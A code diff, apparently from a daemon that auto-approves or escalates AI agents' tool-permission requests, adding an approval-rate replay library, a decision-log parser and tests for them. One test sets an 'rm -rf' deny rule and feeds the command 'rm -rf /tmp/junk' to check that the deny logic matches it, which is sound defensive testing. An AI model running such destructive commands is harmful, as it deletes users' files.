+  test('round-trips the PRECEDENT-approve template (:875)', () => {
+    const line =
+      '[AutoApprove sess1] PRECEDENT Bash: approve (0ms) - session precedent (#976): you approved this exact operation at 2026-08-15T00:00:00.000Z (band=low, grade=strong)';
+    const { lines } = parseDecisionLog(line);
+    const parsed = lines[0];
+    expect(parsed?.matched).toBe(true);
+    expect(parsed?.tag).toBe('sess1');
+    expect(parsed?.verdict).toBe('approve');
+    expect(parsed?.durationMs).toBe(0);
+    expect(parsed?.band).toBeUndefined();
+    expect(parsed?.fastPath).toBe(true);
+  });
 });
 
 // ---------------------------------------------------------------------------
@@ -252,6 +326,64 @@ describe('loadCorpusRecords', () => {
       fs.rmSync(dir, { recursive: true, force: true });
     }
   });
+
+  test('a non-default eventName (PostToolUse) returns the record the default event drops', () => {
+    const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'approval-rate-loader-posttooluse-'));
+    const file = path.join(dir, 'corpus.jsonl');
+    const lines = [
+      JSON.stringify({
+        hook_event_name: 'PermissionRequest',
+        tool_name: 'Bash',
+        tool_input: { command: 'git status' },
+      }),
+      JSON.stringify({
+        hook_event_name: 'PostToolUse',
+        tool_name: 'Read',
+        tool_input: { file_path: '/tmp/y' },
+      }),
+    ];
+    fs.writeFileSync(file, lines.join('\n'));
+
+    try {
+      const defaultRecords = loadCorpusRecords(file);
+      expect(defaultRecords).toHaveLength(1);
+      expect(defaultRecords[0]?.toolName).toBe('Bash');
+
+      const postToolUseRecords = loadCorpusRecords(file, 'PostToolUse');
+      expect(postToolUseRecords).toHaveLength(1);
+      expect(postToolUseRecords[0]?.toolName).toBe('Read');
+    } finally {
+      fs.rmSync(dir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ---------------------------------------------------------------------------
+// percentile
+// ---------------------------------------------------------------------------
+
+describe('percentile', () => {
+  test('empty array is null', () => {
+    expect(percentile([], 50)).toBeNull();
+  });
+
+  test('a single sample returns that sample at any percentile', () => {
+    expect(percentile([42], 50)).toBe(42);
+    expect(percentile([42], 95)).toBe(42);
+  });
+
+  test('two samples: p50 picks the lower, p95 the upper', () => {
+    expect(percentile([10, 20], 50)).toBe(10);
+    expect(percentile([10, 20], 95)).toBe(20);
+  });
+
+  // n=4, p50: nearest-rank ceil gives idx = ceil(0.5*4) - 1 = 1 -> the LOWER
+  // of the middle pair (20). A floor-rank convention (idx = floor(0.5*4) = 2)
+  // would instead pick the UPPER middle value (30) -- this pins which one
+  // this function actually returns.
+  test('n=4 p50: ceil-rank and floor-rank diverge, and this is the ceil answer', () => {
+    expect(percentile([10, 20, 30, 40], 50)).toBe(20);
+  });
 });
 
 // ---------------------------------------------------------------------------
@@ -259,7 +391,10 @@ describe('loadCorpusRecords', () => {
 // ---------------------------------------------------------------------------
 
 // Mirrors auto-approve-service.test.ts's own `makeConfig` (that file's
-// :36-70), not imported from it -- it is a local, unexported helper there.
+// :36-71), not imported from it -- it is a local, unexported helper there.
+// One field deliberately differs: `base_url` here is the non-routable
+// 10.255.255.1 (nothing this suite does should ever dial out), where that
+// file's mirror points at the production loopback 127.0.0.1:19924.
 function makeConfig(overrides?: Partial<AutoApproveConfig>): AutoApproveConfig {
   return {
     enabled: true,
@@ -358,5 +493,85 @@ describe('replayDeterministic', () => {
     expect(deduped.tally.total).toBe(2);
     const notDeduped = replayDeterministic(dupeRecords, config);
     expect(notDeduped.tally.total).toBe(3);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// replayDeterministic: agent-scoped permissions (ADR 0025)
+// ---------------------------------------------------------------------------
+
+describe('replayDeterministic: agent-scoped permissions', () => {
+  // `net-read` (WebFetch/WebSearch) is in no preset and no default (ADR
+  // 0025), so the base policy never approves it; only a matched
+  // `[auto_approve.agents.<type>]` section's own `approve_groups` does --
+  // and that key REPLACES the base rather than unioning with it.
+  const record: CorpusRecord = {
+    toolName: 'WebFetch',
+    toolInput: { url: 'https://example.com' },
+    agentType: undefined,
+    index: 0,
+  };
+  const config = makeConfig({
+    approve_groups: [],
+    agents: { Explore: { approve_groups: ['net-read'] } },
+  });
+
+  test('a matched agent type (Explore) approves via its own section', () => {
+    const result = replayDeterministic([{ ...record, agentType: 'Explore' }], config);
+    expect(result.tally.approve).toBe(1);
+    expect(result.records[0]?.source).toBe('group');
+  });
+
+  test('undefined agentType resolves to the base policy and stays residual', () => {
+    const result = replayDeterministic([{ ...record, agentType: undefined }], config);
+    expect(result.tally.residual).toBe(1);
+  });
+
+  test('an unmatched agent type falls through to the base policy, also residual', () => {
+    const result = replayDeterministic([{ ...record, agentType: 'pr-review' }], config);
+    expect(result.tally.residual).toBe(1);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// replayDeterministic: deny/allow source splits
+// ---------------------------------------------------------------------------
+
+describe('replayDeterministic: source splits', () => {
+  test('deny-covered splits pattern vs. group', () => {
+    const config = makeConfig({ deny: ['rm -rf'], deny_groups: ['fs-write'] });
+    const records: CorpusRecord[] = [
+      // Matches the user's own `deny` pattern (substring).
+      {
+        toolName: 'Bash',
+        toolInput: { command: 'rm -rf /tmp/junk' },
+        agentType: undefined,
+        index: 0,
+      },
+      // `rm`/`rmdir` are deliberately absent from `fs-write` (ADR 0023), so
+      // this one is caught only by `deny_groups`, not the pattern above.
+      {
+        toolName: 'Bash',
+        toolInput: { command: 'mkdir /tmp/new-dir' },
+        agentType: undefined,
+        index: 1,
+      },
+    ];
+    const result = replayDeterministic(records, config);
+    expect(result.tally.denyCovered).toBe(2);
+    expect(result.tally.denyCoveredBySource).toEqual({ pattern: 1, group: 1 });
+  });
+
+  test('approve splits allow vs. approve_groups', () => {
+    const config = makeConfig({ allow: ['git status'], approve_groups: ['read-only'] });
+    const records: CorpusRecord[] = [
+      // Matches the user's own `allow` list.
+      { toolName: 'Bash', toolInput: { command: 'git status' }, agentType: undefined, index: 0 },
+      // Matches only the curated `read-only` group.
+      { toolName: 'Read', toolInput: { file_path: '/tmp/x' }, agentType: undefined, index: 1 },
+    ];
+    const result = replayDeterministic(records, config);
+    expect(result.tally.approve).toBe(2);
+    expect(result.tally.approveBySource).toEqual({ allow: 1, group: 1 });
   });
 });

--- a/packages/daemon/tests/auto-approve/approval-rate.test.ts
+++ b/packages/daemon/tests/auto-approve/approval-rate.test.ts
@@ -103,6 +103,8 @@ describe('parseDecisionLog', () => {
   const queueTimeout =
     '[AutoApprove sess-q] Bash: escalate (241007ms) - eval queue wait exceeded 240000ms; escalating to user';
   const garbage = 'some unrelated daemon log line about nothing decision-shaped';
+  const lifecycle =
+    '[AutoApprove 17a90c4f] Externally resolved 75704a96 (PostToolUse); clearing stale escalation';
 
   test('round-trips a real formatMatrixContext post-LLM escalate line', () => {
     const { lines } = parseDecisionLog(postLlmEscalate);
@@ -159,10 +161,17 @@ describe('parseDecisionLog', () => {
     expect(line?.queueTimeout).toBe(true);
   });
 
-  test('an unrecognized line is unparsed, never thrown on', () => {
+  test('a non-AutoApprove line is ignored, never thrown on', () => {
     const { lines, tally } = parseDecisionLog(garbage);
     expect(lines[0]?.matched).toBe(false);
-    expect(tally.unparsed).toBe(1);
+    expect(tally.autoApproveNonDecision).toBe(0);
+  });
+
+  test('an AutoApprove lifecycle line counts as non-decision, not a verdict', () => {
+    const { lines, tally } = parseDecisionLog(lifecycle);
+    expect(lines[0]?.matched).toBe(false);
+    expect(tally.autoApproveNonDecision).toBe(1);
+    expect(tally.byVerdict.approve + tally.byVerdict.escalate + tally.byVerdict.deny).toBe(0);
   });
 
   test('tallies a mixed log across all known shapes', () => {
@@ -176,12 +185,13 @@ describe('parseDecisionLog', () => {
       queueTimeout,
       riskCeiling,
       garbage,
+      lifecycle,
     ].join('\n');
 
     const { tally } = parseDecisionLog(text);
 
-    expect(tally.totalLines).toBe(9);
-    expect(tally.unparsed).toBe(1);
+    expect(tally.totalLines).toBe(10);
+    expect(tally.autoApproveNonDecision).toBe(1);
     expect(tally.byVerdict).toEqual({
       approve: 1,
       deny: 2,

--- a/packages/daemon/tests/auto-approve/approval-rate.ts
+++ b/packages/daemon/tests/auto-approve/approval-rate.ts
@@ -1,0 +1,577 @@
+/**
+ * Phase 1 approval-rate report library (epic #1057, closes #992's
+ * replay-harness request).
+ *
+ * Importable pieces shared by `run-approval-rate-report.ts` (a standalone
+ * CLI) and `approval-rate.test.ts` (a `bun:test` suite). Deliberately no
+ * `bun:test` import anywhere in this file: the CLI runs it as a plain
+ * script via `bun run-approval-rate-report.ts`, not through the test
+ * runner, and this keeps the two consumers importing the exact same code
+ * path rather than the CLI re-deriving anything.
+ *
+ * Four independent units, each documented at its own definition below:
+ *
+ *   - `loadCorpusRecords` -- JSONL -> `PermissionRequest` records. Same
+ *     shape as `guard-chain-replay.test.ts`'s local loader, generalized to
+ *     take a path so it also reads a raw `~/.remi/hook-diag.jsonl`.
+ *   - `replayDeterministic` -- runs the real, exported
+ *     `AutoApproveService.evaluateDeterministic` (#1024) over a record set,
+ *     tallying coverage and banding the residue that would reach the LLM.
+ *   - `classifyMiss` -- report-only shell-shape classifier for a Bash
+ *     command that missed deterministic coverage. Never imported by `src/`
+ *     -- see its own doc for why.
+ *   - `parseDecisionLog` -- parses `auto-approve-service.ts`'s own `logFn`
+ *     output (the exact templates it writes, read from source, not
+ *     reimplemented logic) into verdict/band/layer counts and latencies.
+ *
+ * NO MOCKS (repo rule): every unit here either calls a real exported
+ * function (`evaluateDeterministic`, `classifyRisk`, `maskQuotedSpans`,
+ * `findRedirectClauses`, `splitCompoundParts`) or parses real text a real
+ * function produced. Nothing in this file reimplements decision logic.
+ */
+
+import * as fs from 'node:fs';
+import { AutoApproveService } from '../../src/auto-approve/auto-approve-service.ts';
+import type { DecidingLayer, RiskBand } from '../../src/auto-approve/risk-bands.ts';
+import { classifyRisk } from '../../src/auto-approve/risk-bands.ts';
+import {
+  findRedirectClauses,
+  maskQuotedSpans,
+  splitCompoundParts,
+} from '../../src/auto-approve/shell-safety.ts';
+import type { AutoApproveConfig } from '../../src/auto-approve/types.ts';
+
+// ---------------------------------------------------------------------------
+// (a) Corpus loader
+// ---------------------------------------------------------------------------
+
+/** One `PermissionRequest` record, reduced to what `evaluateDeterministic`
+ *  and `classifyRisk` read. `index` is the record's line number in the
+ *  source file (0-based), kept for traceability from a report row back to
+ *  the exact line that produced it. */
+export interface CorpusRecord {
+  readonly toolName: string;
+  readonly toolInput: Record<string, unknown>;
+  readonly agentType: string | undefined;
+  readonly index: number;
+}
+
+/**
+ * Reads a JSONL hook-event capture and keeps only `PermissionRequest`
+ * records carrying a string `tool_name` and an object `tool_input` -- the
+ * two fields `evaluateDeterministic` reads. Malformed lines (bad JSON, wrong
+ * shape, a different `hook_event_name`) are skipped silently rather than
+ * thrown on: both the structure-preserving fixture
+ * (`fixtures/.local-command-corpus.jsonl`, gitignored -- a developer could
+ * regenerate it mid-edit) and a raw `~/.remi/hook-diag.jsonl` (real Claude
+ * Code traffic, carrying every OTHER registered hook event type too) are
+ * locally-generated data outside this repo's control, and one corrupt or
+ * unrelated line must not fail the whole replay.
+ *
+ * Mirrors `guard-chain-replay.test.ts`'s `loadLocalCorpusReplayRecords`
+ * (that file's :385-407) -- same filter, same skip-on-malformed posture,
+ * generalized to take a path (that file's version is hardcoded to the one
+ * fixture) and to carry `agent_type` through (ADR 0025 per-agent-type
+ * policy needs it; the guard chain this mirrors does not).
+ */
+export function loadCorpusRecords(filePath: string): CorpusRecord[] {
+  const raw = fs.readFileSync(filePath, 'utf8');
+  const lines = raw.split('\n').filter((line) => line.trim().length > 0);
+  const records: CorpusRecord[] = [];
+  lines.forEach((line, i) => {
+    let parsed: Record<string, unknown>;
+    try {
+      parsed = JSON.parse(line) as Record<string, unknown>;
+    } catch {
+      return;
+    }
+    if (parsed['hook_event_name'] !== 'PermissionRequest') return;
+    const toolName = parsed['tool_name'];
+    const toolInput = parsed['tool_input'];
+    if (typeof toolName !== 'string') return;
+    if (typeof toolInput !== 'object' || toolInput === null || Array.isArray(toolInput)) return;
+    const agentTypeRaw = parsed['agent_type'];
+    records.push({
+      toolName,
+      toolInput: toolInput as Record<string, unknown>,
+      agentType: typeof agentTypeRaw === 'string' ? agentTypeRaw : undefined,
+      index: i,
+    });
+  });
+  return records;
+}
+
+// ---------------------------------------------------------------------------
+// (b) Deterministic replay
+// ---------------------------------------------------------------------------
+
+/** Per-record outcome of a deterministic replay. `source`/`reasoning` are
+ *  `undefined` for the `null` (residual) case; `band` is set ONLY for that
+ *  case -- an approve/deny-covered verdict never needed `classifyRisk` to
+ *  decide anything, so banding it would imply a risk assessment this report
+ *  never actually asked for. */
+export interface ReplayRecordResult {
+  readonly index: number;
+  readonly toolName: string;
+  readonly decision: 'approve' | 'deny-covered' | null;
+  readonly source: 'allow' | 'group' | 'deny-pattern' | 'deny-group' | undefined;
+  readonly reasoning: string | undefined;
+  readonly band: RiskBand | undefined;
+}
+
+interface ReplayToolTally {
+  total: number;
+  approve: number;
+  denyCovered: number;
+  residual: number;
+}
+
+export interface ReplayTally {
+  readonly total: number;
+  readonly approve: number;
+  readonly approveBySource: { readonly allow: number; readonly group: number };
+  readonly denyCovered: number;
+  readonly denyCoveredBySource: { readonly pattern: number; readonly group: number };
+  /** Nothing deterministic decided it -- what would reach the LLM in a live
+   *  `evaluate()` call. */
+  readonly residual: number;
+  readonly residualByBand: Record<RiskBand, number>;
+  readonly perTool: Readonly<Record<string, Readonly<ReplayToolTally>>>;
+}
+
+export interface ReplayResult {
+  readonly tally: ReplayTally;
+  readonly records: readonly ReplayRecordResult[];
+}
+
+export interface ReplayOptions {
+  /** Dedupe `Bash` records by exact `tool_input.command` string before
+   *  replay (the CLI's `--unique`). Only `Bash` is deduped -- every other
+   *  tool's `tool_input` shape is tool-specific, and the dominant source of
+   *  near-duplicate volume in a real capture is the same shell command run
+   *  repeatedly within one session. First occurrence (corpus order) of each
+   *  distinct command wins; every other record, and every non-Bash record,
+   *  passes through unchanged. */
+  readonly unique?: boolean;
+}
+
+function emptyBandCounts(): Record<RiskBand, number> {
+  return { low: 0, moderate: 0, high: 0, critical: 0 };
+}
+
+function ensureToolTally(
+  perTool: Record<string, ReplayToolTally>,
+  toolName: string,
+): ReplayToolTally {
+  const existing = perTool[toolName];
+  if (existing) return existing;
+  const created: ReplayToolTally = { total: 0, approve: 0, denyCovered: 0, residual: 0 };
+  perTool[toolName] = created;
+  return created;
+}
+
+/**
+ * Replays `records` through `AutoApproveService.evaluateDeterministic`
+ * (#1024) only -- no LLM, no engine, no precedent, no queue. Constructs a
+ * fresh, engine-free service (the constructor's optional third `engineHost`
+ * param, #818, is left `undefined`; nothing this function calls ever reads
+ * it), so the tally reflects EXACTLY the same allow/deny/group logic a live
+ * daemon's hook-time and `evaluate()` paths share -- the real exported
+ * method, never a reimplementation.
+ *
+ * For each record: `approve` and `deny-covered` are tallied as returned,
+ * split by source (the user's own `allow`/`deny` list vs. a curated
+ * `approve_groups`/`deny_groups` match -- read off the reasoning string's
+ * own prefix, the same distinguishing text `evaluateDeterministic` already
+ * produces, per its own doc's "reasoning strings ARE currently
+ * distinguishable" note in `types.ts`). `null` (nothing deterministic
+ * decided it -- would reach the LLM in a live `evaluate()` call) is
+ * additionally banded with `classifyRisk`, so the residual's RISK, not just
+ * its size, is visible.
+ */
+export function replayDeterministic(
+  records: readonly CorpusRecord[],
+  config: AutoApproveConfig,
+  opts?: ReplayOptions,
+): ReplayResult {
+  const service = new AutoApproveService(config, () => {});
+
+  let effective: readonly CorpusRecord[] = records;
+  if (opts?.unique) {
+    const seenCommands = new Set<string>();
+    effective = records.filter((record) => {
+      if (record.toolName !== 'Bash') return true;
+      const command = record.toolInput['command'];
+      if (typeof command !== 'string') return true;
+      if (seenCommands.has(command)) return false;
+      seenCommands.add(command);
+      return true;
+    });
+  }
+
+  const perTool: Record<string, ReplayToolTally> = {};
+  const results: ReplayRecordResult[] = [];
+  let approve = 0;
+  let approveAllow = 0;
+  let approveGroup = 0;
+  let denyCovered = 0;
+  let denyPattern = 0;
+  let denyGroup = 0;
+  let residual = 0;
+  const residualByBand = emptyBandCounts();
+
+  for (const record of effective) {
+    const toolTally = ensureToolTally(perTool, record.toolName);
+    toolTally.total += 1;
+
+    const verdict = service.evaluateDeterministic(
+      record.toolName,
+      record.toolInput,
+      record.agentType,
+    );
+
+    if (verdict === null) {
+      residual += 1;
+      toolTally.residual += 1;
+      const band = classifyRisk(record.toolName, record.toolInput);
+      residualByBand[band] += 1;
+      results.push({
+        index: record.index,
+        toolName: record.toolName,
+        decision: null,
+        source: undefined,
+        reasoning: undefined,
+        band,
+      });
+      continue;
+    }
+
+    if (verdict.decision === 'approve') {
+      approve += 1;
+      toolTally.approve += 1;
+      const source: 'allow' | 'group' = verdict.reasoning.startsWith('allow-matched')
+        ? 'allow'
+        : 'group';
+      if (source === 'allow') approveAllow += 1;
+      else approveGroup += 1;
+      results.push({
+        index: record.index,
+        toolName: record.toolName,
+        decision: 'approve',
+        source,
+        reasoning: verdict.reasoning,
+        band: undefined,
+      });
+      continue;
+    }
+
+    denyCovered += 1;
+    toolTally.denyCovered += 1;
+    const source: 'deny-pattern' | 'deny-group' = verdict.reasoning.startsWith(
+      'deny-matched pattern',
+    )
+      ? 'deny-pattern'
+      : 'deny-group';
+    if (source === 'deny-pattern') denyPattern += 1;
+    else denyGroup += 1;
+    results.push({
+      index: record.index,
+      toolName: record.toolName,
+      decision: 'deny-covered',
+      source,
+      reasoning: verdict.reasoning,
+      band: undefined,
+    });
+  }
+
+  return {
+    tally: {
+      total: effective.length,
+      approve,
+      approveBySource: { allow: approveAllow, group: approveGroup },
+      denyCovered,
+      denyCoveredBySource: { pattern: denyPattern, group: denyGroup },
+      residual,
+      residualByBand,
+      perTool,
+    },
+    records: results,
+  };
+}
+
+// ---------------------------------------------------------------------------
+// (c) Miss classifier
+// ---------------------------------------------------------------------------
+
+export type MissBucket = 'heredoc' | 'redirection' | 'pipeline' | 'chained' | 'single';
+
+/**
+ * True if `masked` (already run through `maskQuotedSpans`, so a quoted `<<`
+ * cannot trip this) contains a real heredoc operator (`<<` or the indented
+ * `<<-`).
+ *
+ * Deliberately excludes `<<<`, the here-string operator -- a DIFFERENT
+ * construct (reads one word/expansion, not a multi-line body), by masking
+ * every run of 3+ `<` to underscores BEFORE testing for `<<`. A plain
+ * substring scan for `"<<"` cannot make this distinction on its own, since
+ * `<<<` literally contains `<<` as its first two characters. `<<<` (and the
+ * rarer `<<<<`) therefore falls through `classifyMiss` to the
+ * pipeline/chained/single buckets below, exactly like any other non-heredoc
+ * command -- there is no dedicated "here-string" bucket, per the plan this
+ * classifier implements.
+ */
+function hasHeredocOperator(masked: string): boolean {
+  const withoutHereStrings = masked.replace(/<{3,}/g, (run) => '_'.repeat(run.length));
+  return /<<-?/.test(withoutHereStrings);
+}
+
+/**
+ * Buckets a Bash command that missed deterministic coverage (the `null`
+ * residue `replayDeterministic` bands by risk) by the shell SHAPE
+ * responsible, so the CLI's miss table can show "these misses are heredocs,
+ * these are pipelines" instead of one undifferentiated pile.
+ *
+ * Precedence, checked in this order: heredoc > redirection > pipeline >
+ * chained > single. A command matching more than one shape (`cat >> f
+ * <<'EOF'` is both a `>>` redirect AND a heredoc) reports the EARLIEST
+ * bucket that applies, so a heredoc-with-redirect is never miscounted as a
+ * plain redirection.
+ *
+ * `maskQuotedSpans` runs once, up front, and both the heredoc check and the
+ * redirect-clause check read the masked text -- a quoted `"<<"` or `"> file"`
+ * inside prose (a commit message, a `--body` argument) is not shell syntax
+ * and must not count as either.
+ *
+ * The `redirection` bucket only catches `>`/`>>` output redirects:
+ * `findRedirectClauses`'s `REDIRECT_CLAUSE_RE` has no `<` input-redirect
+ * detector (`shell-safety.ts` was never asked for one), so a bare `cmd <
+ * file.txt` that is not a heredoc falls through to chained/single, not
+ * this bucket. Narrower than the plan's "redirection" name might suggest;
+ * stated here rather than left for a reader to discover missing.
+ *
+ * REPORT-ONLY. Never imported by `src/` -- `permission-groups.ts` and
+ * `shell-safety.ts` already decide coverage; this classifier exists purely
+ * to explain, after the fact, WHY a command missed it, and folding an
+ * explanatory classification into the decision path is exactly the kind of
+ * drift ADR 0015/0017 warn about for the shared catastrophic-pattern list.
+ */
+export function classifyMiss(command: string): MissBucket {
+  const masked = maskQuotedSpans(command);
+  if (hasHeredocOperator(masked)) return 'heredoc';
+  if (findRedirectClauses(masked).length > 0) return 'redirection';
+  const parts = splitCompoundParts(command);
+  if (parts.some((part) => part.joiner === '|')) return 'pipeline';
+  if (parts.some((part) => part.joiner !== null)) return 'chained';
+  return 'single';
+}
+
+// ---------------------------------------------------------------------------
+// (d) remi.log decision parser
+// ---------------------------------------------------------------------------
+
+export type LogVerdict = 'approve' | 'deny' | 'escalate' | 'cancelled' | 'error';
+
+/** One parsed (or unrecognized) decision line. `matched: false` carries
+ *  every other field `undefined` -- the caller counts it as `unparsed`. */
+export interface ParsedLogLine {
+  readonly raw: string;
+  readonly matched: boolean;
+  readonly tag: string | undefined;
+  readonly toolName: string | undefined;
+  readonly verdict: LogVerdict | undefined;
+  readonly durationMs: number | undefined;
+  readonly band: RiskBand | undefined;
+  readonly authorityPresent: boolean | undefined;
+  readonly decidedBy: DecidingLayer | undefined;
+  readonly reasoning: string | undefined;
+  /** True for every shape that never reached the LLM: the deterministic
+   *  DENIED/approve lines, the pre-LLM PRECEDENT shortcut, the
+   *  always-escalate design/multichoice/index-mismatch/queue-timeout lines,
+   *  CANCELLED, ERROR. False only for the post-LLM line (the one carrying
+   *  the `[band=...]` bracket `formatMatrixContext` produces) -- every
+   *  earlier `return` in `evaluate()` logs its own line first and never
+   *  reaches that call. */
+  readonly fastPath: boolean;
+  /** Reasoning contains "eval queue wait exceeded" -- `evaluate()`'s
+   *  `acquireSlot` timeout path (#551). */
+  readonly queueTimeout: boolean;
+}
+
+/**
+ * The post-LLM line `auto-approve-service.ts` logs after every real model
+ * round trip (and after the authority/risk-ceiling/counterfactual guards
+ * that run on its result): `[AutoApprove <tag>] [DENIED ]<Tool>: <verdict>
+ * (<N>ms) [band=<band> authority=yes|no[ decided_by=<layer>]] - <reasoning>`.
+ * `decided_by` is optional (older logs predate #1040); the whole bracket is
+ * ALSO optional here only so this one regex can double as the fast-path
+ * shapes below that share its "verdict (Nms) - reasoning" tail but never
+ * carry a bracket at all (deterministic approve, pre-LLM PRECEDENT,
+ * every always-escalate variant, the queue-timeout escalate).
+ */
+const FAMILY2_RE =
+  /^\[AutoApprove(?: (?<tag>[^\]]+))?\] (?:(?<tag2>DENIED|PRECEDENT) )?(?<tool>\S+): (?<verdict>approve|deny|escalate) \((?<duration>\d+)ms\)(?: \[band=(?<band>low|moderate|high|critical) authority=(?<authority>yes|no)(?: decided_by=(?<decidedBy>[a-z_]+))?\])? - (?<reasoning>.*)$/;
+
+/**
+ * The fast-path shapes with NO verdict word and NO ` - ` separator: the
+ * deterministic DENIED line, CANCELLED, and ERROR. Each reads
+ * `[AutoApprove <tag>] TAG <Tool>: <reasoning> (<N>ms)`, where `TAG` alone
+ * (not a captured verdict word) says what happened.
+ */
+const FAMILY1_RE =
+  /^\[AutoApprove(?: (?<tag>[^\]]+))?\] (?<tag2>DENIED|CANCELLED|ERROR) (?<tool>\S+): (?<reasoning>.+) \((?<duration>\d+)ms\)$/;
+
+const FAMILY1_VERDICT: Readonly<Record<string, LogVerdict>> = {
+  DENIED: 'deny',
+  CANCELLED: 'cancelled',
+  ERROR: 'error',
+};
+
+function unmatchedLine(raw: string): ParsedLogLine {
+  return {
+    raw,
+    matched: false,
+    tag: undefined,
+    toolName: undefined,
+    verdict: undefined,
+    durationMs: undefined,
+    band: undefined,
+    authorityPresent: undefined,
+    decidedBy: undefined,
+    reasoning: undefined,
+    fastPath: false,
+    queueTimeout: false,
+  };
+}
+
+/**
+ * Parses one line of `auto-approve-service.ts`'s `logFn` output. Templates
+ * read from source (this file's module doc), not guessed. Never throws on
+ * an unrecognized line -- returns `{matched: false, ...}` instead, so a line
+ * from a future log format, or ordinary non-decision daemon output mixed
+ * into the same file, is counted as `unparsed` by `parseDecisionLog` rather
+ * than crashing the report.
+ */
+function parseLine(raw: string): ParsedLogLine {
+  const m2 = FAMILY2_RE.exec(raw);
+  if (m2?.groups) {
+    const g = m2.groups;
+    const verdict = g['verdict'] as LogVerdict | undefined;
+    const band = g['band'] as RiskBand | undefined;
+    const decidedBy = g['decidedBy'] as DecidingLayer | undefined;
+    const reasoning = g['reasoning'];
+    return {
+      raw,
+      matched: true,
+      tag: g['tag'],
+      toolName: g['tool'],
+      verdict,
+      durationMs: g['duration'] !== undefined ? Number(g['duration']) : undefined,
+      band,
+      authorityPresent: g['authority'] === undefined ? undefined : g['authority'] === 'yes',
+      decidedBy,
+      reasoning,
+      fastPath: band === undefined,
+      queueTimeout: reasoning?.includes('eval queue wait exceeded') ?? false,
+    };
+  }
+
+  const m1 = FAMILY1_RE.exec(raw);
+  if (m1?.groups) {
+    const g = m1.groups;
+    const verdict = FAMILY1_VERDICT[g['tag2'] ?? ''];
+    return {
+      raw,
+      matched: true,
+      tag: g['tag'],
+      toolName: g['tool'],
+      verdict,
+      durationMs: g['duration'] !== undefined ? Number(g['duration']) : undefined,
+      band: undefined,
+      authorityPresent: undefined,
+      decidedBy: undefined,
+      reasoning: g['reasoning'],
+      fastPath: true,
+      queueTimeout: false,
+    };
+  }
+
+  return unmatchedLine(raw);
+}
+
+export interface DecisionLogTally {
+  readonly totalLines: number;
+  readonly unparsed: number;
+  readonly fastPathCount: number;
+  readonly llmPathCount: number;
+  readonly byVerdict: Readonly<Record<LogVerdict, number>>;
+  /** key: `${verdict}|${band ?? 'none'}|${decidedBy ?? 'none'}` -> count. */
+  readonly byVerdictBandDecidedBy: Readonly<Record<string, number>>;
+  readonly latenciesByVerdict: Readonly<Record<LogVerdict, readonly number[]>>;
+  readonly queueTimeoutCount: number;
+  readonly riskCeilingCount: number;
+}
+
+export interface ParsedDecisionLog {
+  readonly tally: DecisionLogTally;
+  readonly lines: readonly ParsedLogLine[];
+}
+
+function emptyVerdictCounts(): Record<LogVerdict, number> {
+  return { approve: 0, deny: 0, escalate: 0, cancelled: 0, error: 0 };
+}
+
+function emptyVerdictLatencies(): Record<LogVerdict, number[]> {
+  return { approve: [], deny: [], escalate: [], cancelled: [], error: [] };
+}
+
+/**
+ * Parses a `remi.log` (or any text carrying `[AutoApprove ...]` decision
+ * lines mixed with other daemon output) into per-verdict/band/layer counts
+ * and latency samples. No printing here -- percentile computation and
+ * rendering are `run-approval-rate-report.ts`'s job.
+ */
+export function parseDecisionLog(text: string): ParsedDecisionLog {
+  const lines = text.split('\n').filter((line) => line.trim().length > 0);
+  const parsedLines = lines.map(parseLine);
+
+  const byVerdict = emptyVerdictCounts();
+  const latenciesByVerdict = emptyVerdictLatencies();
+  const byVerdictBandDecidedBy: Record<string, number> = {};
+  let unparsed = 0;
+  let fastPathCount = 0;
+  let llmPathCount = 0;
+  let queueTimeoutCount = 0;
+  let riskCeilingCount = 0;
+
+  for (const line of parsedLines) {
+    if (!line.matched || line.verdict === undefined) {
+      unparsed += 1;
+      continue;
+    }
+    byVerdict[line.verdict] += 1;
+    if (line.durationMs !== undefined) {
+      latenciesByVerdict[line.verdict].push(line.durationMs);
+    }
+    const key = `${line.verdict}|${line.band ?? 'none'}|${line.decidedBy ?? 'none'}`;
+    byVerdictBandDecidedBy[key] = (byVerdictBandDecidedBy[key] ?? 0) + 1;
+    if (line.fastPath) fastPathCount += 1;
+    else llmPathCount += 1;
+    if (line.queueTimeout) queueTimeoutCount += 1;
+    if (line.decidedBy === 'risk_ceiling') riskCeilingCount += 1;
+  }
+
+  return {
+    tally: {
+      totalLines: parsedLines.length,
+      unparsed,
+      fastPathCount,
+      llmPathCount,
+      byVerdict,
+      byVerdictBandDecidedBy,
+      latenciesByVerdict,
+      queueTimeoutCount,
+      riskCeilingCount,
+    },
+    lines: parsedLines,
+  };
+}

--- a/packages/daemon/tests/auto-approve/approval-rate.ts
+++ b/packages/daemon/tests/auto-approve/approval-rate.ts
@@ -73,8 +73,21 @@ export interface CorpusRecord {
  * generalized to take a path (that file's version is hardcoded to the one
  * fixture) and to carry `agent_type` through (ADR 0025 per-agent-type
  * policy needs it; the guard chain this mirrors does not).
+ *
+ * `eventName` defaults to `PermissionRequest` -- the population that actually
+ * asked remi for a decision, the one #996 measured. It exists because
+ * hook-diag capture is gated on `REMI_HOOK_DEBUG=1` (hook-server.ts) and a
+ * machine's capture window may hold no PermissionRequest at all (this repo's
+ * dev machine: 142 events, zero of them). `PreToolUse` records carry the same
+ * `tool_name`/`tool_input` and can stand in as a PROXY corpus, with a caveat
+ * the CLI prints: PreToolUse fires for every tool call, including ones Claude
+ * Code's own settings allowlist approved without ever asking remi, so
+ * coverage measured on it is not the same population as #996's.
  */
-export function loadCorpusRecords(filePath: string): CorpusRecord[] {
+export function loadCorpusRecords(
+  filePath: string,
+  eventName = 'PermissionRequest',
+): CorpusRecord[] {
   const raw = fs.readFileSync(filePath, 'utf8');
   const lines = raw.split('\n').filter((line) => line.trim().length > 0);
   const records: CorpusRecord[] = [];
@@ -85,7 +98,7 @@ export function loadCorpusRecords(filePath: string): CorpusRecord[] {
     } catch {
       return;
     }
-    if (parsed['hook_event_name'] !== 'PermissionRequest') return;
+    if (parsed['hook_event_name'] !== eventName) return;
     const toolName = parsed['tool_name'];
     const toolInput = parsed['tool_input'];
     if (typeof toolName !== 'string') return;
@@ -372,7 +385,8 @@ export function classifyMiss(command: string): MissBucket {
 export type LogVerdict = 'approve' | 'deny' | 'escalate' | 'cancelled' | 'error';
 
 /** One parsed (or unrecognized) decision line. `matched: false` carries
- *  every other field `undefined` -- the caller counts it as `unparsed`. */
